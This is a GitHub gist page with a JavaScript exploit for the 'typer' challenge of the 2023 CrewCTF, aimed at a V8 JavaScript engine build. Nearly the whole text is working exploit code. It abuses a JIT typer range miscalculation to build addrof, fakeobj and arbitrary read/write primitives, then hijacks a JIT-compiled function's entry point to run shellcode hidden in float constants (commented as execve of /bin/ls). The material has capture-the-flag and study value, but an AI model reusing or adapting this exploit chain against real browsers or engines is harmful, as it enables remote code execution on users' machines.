Skip to content

Instantly share code, notes, and snippets.

@anvbis

anvbis/2023_crewctf_typer.js

Last active July 9, 2023 17:22
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save anvbis/a214b7d59a1eb007696f3dfe463b36a7 to your computer and use it in GitHub Desktop.
Save anvbis/a214b7d59a1eb007696f3dfe463b36a7 to your computer and use it in GitHub Desktop.
Download ZIP
2023_crewctf_typer.js
Raw
2023_crewctf_typer.js
let _buf = new ArrayBuffer(8);
let _flt = new Float64Array(_buf);
let _int = new BigUint64Array(_buf);
const ftoi = x => {
_flt[0] = x;
return _int[0];
};
const itof = x => {
_int[0] = x;
return _flt[0];
};
// execve("/bin/ls", 0, 0);
const shell = () => {
return [
1.9711828979523134e-246,
1.9562206098792612e-246,
1.9557819155246427e-246,
1.9711824228871598e-246,
1.971182639857203e-246,
1.9711829003383248e-246,
1.9895153920223886e-246,
1.971182898881177e-246
];
};
for (let i = 0; i < 100000; i++)
shell();
function _leakmap() {
var x = -Infinity;
for (var i = 0; i < 1; i += x) {
if (i == -Infinity)
x = +Infinity;
}
i = Math.abs(i);
i = Math.floor(i);
i = Math.max(i, 32);
i = -i;
i = Math.max(i, -33);
i = -i;
i >>= 31; // Type: Range(0, 0), Actual: -1
let a = new Array(3 + 30*(1 + i));
a[0] = 1.1;
a[1] = 2.2;
let b = [1.1, 2.2, 3.3];
let z = a[Symbol.iterator]();
z.next();z.next();z.next();
z.next();z.next();z.next();z.next();z.next();z.next();
let v = z.next().value;
return [v, a, b];
}
function _addrof(obj) {
var x = -Infinity;
for (var i = 0; i < 1; i += x) {
if (i == -Infinity)
x = +Infinity;
}
i = Math.abs(i);
i = Math.floor(i);
i = Math.max(i, 32);
i = -i;
i = Math.max(i, -33);
i = -i;
i >>= 31; // Type: Range(0, 0), Actual: -1
let a = new Array(3 + 30*(1 + i));
a[0] = 1.1;
a[1] = 2.2;
let b = [obj, 2, 3];
let z = a[Symbol.iterator]();
z.next();z.next();z.next();
z.next();z.next();z.next();
let v = z.next().value;
return [v, a, b];
}
function _fakeobj(ptr, flag) {
var x = -Infinity;
for (var i = 0; i < 1; i += x) {
if (i == -Infinity)
x = +Infinity;
}
i = Math.abs(i);
i = Math.floor(i);
i = Math.max(i, 32);
i = -i;
i = Math.max(i, -33);
i = -i;
i >>= 31; // Type: Range(0, 0), Actual: -1
let a = new Array(3 + 30*(1 + i));
a[0] = 1;
a[1] = 2;
let b = [1.1, 2.2, 3.3];
b[0] = ptr;
let z = a[Symbol.iterator]();
z.next();z.next();z.next();
z.next();z.next();z.next();z.next();z.next();z.next();
let o = z.next().value; // addrof(o) = ptr
return [o, a, b];
}
for (let i = 0; i < 50000; i++)
_leakmap();
let map = ftoi(_leakmap()[0]);
for (let i = 0; i < 50000; i++)
_addrof({a: 1});
for (let i = 0; i < 50000; i++)
_fakeobj(itof(0n));
let store = [itof((64n << 33n) + 0x901n), 1.1, 2.2];
let flt = [1.1];
let obj = [{a: 1}];
let rdw = [1.1];
let store_addr = ftoi(_addrof(store)[0]) & 0xffffffffn;
let fake_store_addr = store_addr + 0x18n + 8n;
let fakeobj_arr = [
itof(map),
itof((64n << 33n) + fake_store_addr),
itof(0x0019c6910000117dn)
];
let fakeobj_arr_addr = ftoi(_addrof(fakeobj_arr)[0]) & 0xffffffffn;
let target = fakeobj_arr_addr + 0x58n + 8n;
let oob = _fakeobj(itof(target))[0];
// flt.elements @ oob[10] (upper)
// obj.elements @ oob[17] (lower)
// rdw.elements @ oob[26] (upper)
flt_elem = ftoi(oob[10]) >> 32n;
oob[17] = itof((2n << 32n) + flt_elem);
function addrof(o) {
obj[0] = o;
return ftoi(flt[0]) & 0xffffffffn;
}
function read(p) {
let lower = ftoi(oob[26]) & 0xffffffffn;
oob[26] = itof(((p - 8n + 1n) << 32n) + lower);
return ftoi(rdw[0]);
}
function write(p, x) {
let lower = ftoi(oob[26]) & 0xffffffffn;
oob[26] = itof(((p - 8n) << 32n) + lower);
rdw[0] = itof(x);
}
let code = (read(addrof(shell) - 1n + 0x18n) - 1n) & 0xffffffffn;
let entry = (read(code + 0x10n));
write(code + 0x10n + 1n, entry + 0x56n);
shell();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment